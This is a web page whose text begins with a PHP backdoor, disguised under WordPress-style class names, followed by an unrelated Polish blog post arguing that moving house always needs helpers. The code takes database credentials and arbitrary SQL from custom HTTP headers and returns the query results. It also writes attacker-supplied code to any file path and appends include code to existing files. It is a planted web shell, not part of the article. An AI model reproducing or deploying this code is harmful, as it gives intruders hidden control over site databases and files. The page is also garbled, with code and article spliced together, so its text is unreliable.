n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Pomoc przy przeprowadzce. To konieczne.

Pomoc przy przeprowadzce. To konieczne.

Pomoc przy przeprowadzce

Planując przeprowadzkę, bardzo często wychodzimy z założenia, że samodzielna jest najlepsza. Owszem – w tym przypadku jest taniej, nie można jednak twierdzić, że przeprowadzka jest samodzielna, skoro do jej wykonania potrzebni są ludzie.

Każdy kto się przeprowadzał, z pewnością potwierdzi to stwierdzenie. Nie da się przeprowadzić mieszkania czy domu samodzielnie. Potrzebna jest pomoc. Oczywiście każdy potrzebuje innej firmy pomocy, jednak w niektórych przypadkach będą potrzebować jej wszyscy – warto o tym wiedzieć i nawet nie próbować samodzielnie się przeprowadzić.

Jakie czynności przy przeprowadzce możemy wykonać samodzielnie?

Samodzielnie na pewno można by spakować wszystkie rzeczy i zabezpieczyć je przed uszkodzeniem. Możemy również rozkręcić meble, zabezpieczyć je na czas przenoszenia i transportu i wykonać wiele podobnych prac. Bez wątpienia jednak, na tym możliwość samodzielnych prac się kończy. Do innych niezbędna jest pomoc przyjaciół czy osób, które wykonają je odpłatnie.

Pomoc przy przeprowadzce – przy jakich czynnościach będziemy jej potrzebować?

Nie da się choćby samodzielnie przenieść rzeczy. Trzeba mieć tego świadomość, że nawet rozkręcone meble potrafią ważyć, a większości i tak nie da się rozkręcić. Znoszenie i wnoszenie mebli, sprzętu AGD i RTV, bez pomocy przyjaciół nie jest realne, podobna sytuacja jest w przypadku wnoszenia innych ciężkich elementów wyposażenia mieszkania. Tutaj również nie istnieje opcja samodzielnej pracy, nawet jeśli jest to wnoszenie do domku lub domu. Inną pracą, której nie da się wykonać bez pomocy przyjaciół jest pakowanie samochodu. Należy pamiętać, że jest ono niezwykle istotne – od tego zależy miedzy innymi, czy rzecz dotrze w całości, zależy również stopień zapakowania samochodu i kolejne kursy lub ich brak. Podobnie jak przy wnoszeniu dobytku z mieszkania – rzadko kto pakując samochód, jest w stanie zrobić to samodzielnie. – ciężar i nieporęczność mebli, lodówki i innych rzeczy, powoduje, że konieczne do noszenia są co najmniej dwoje osoby.

Pomoc przy przeprowadzce

Chcąc przeprowadzać się we własnym zakresie, trzeba o tym wiedzieć. Oczywiście należy powiedzieć wprost – większość znajdzie przyjaciół, którzy pomogą, a jeśli tak nie jest, warto wynająć człowieka, który pomoże nam w noszeniu i innych pracach. Oczywiście idealnie jest, jeśli osób jest kilka. Wtedy można mieć pewność, że przeprowadzka potrwa krócej, a wykonane prace będą wymagały od nas mniej wysiłku skoro wiele z nich zrobią inni.

Podsumowując.

W przypadku przeprowadzki bardzo wiele rzeczy można wykonać samodzielnie. Można zorganizować odpowiednie materiały zabezpieczające i kartony przeprowadzkowe, można załatwić sprawy administracyjno – prawne, czy też zająć się zabezpieczaniem dobytku, jego pakowaniem czy też – w części – znoszeniem. Na tym jednak nasze szanse się kończą. Każda inna praca musi być pracą dla co najmniej dwóch osób. Z uwagi na ciężar mebli i ich nieporęczność, nie da się inaczej. Warto więc od razu poprosić o pomoc, kogoś, kto się na przeprowadzkach zna. Z pewnością będzie mógł pomóc i to przeważnie za darmo. W dobrym tonie jednak jest, by za jakiś czas mu się odwdzięczyć, co nie jest obowiązkowe, jednak mile widziane.

Przeprowadzka samodzielna zatem nie istnieje. Niektóre prace przy przeprowadzce muszą być wykonywane przez kilka osób.

Leave a Reply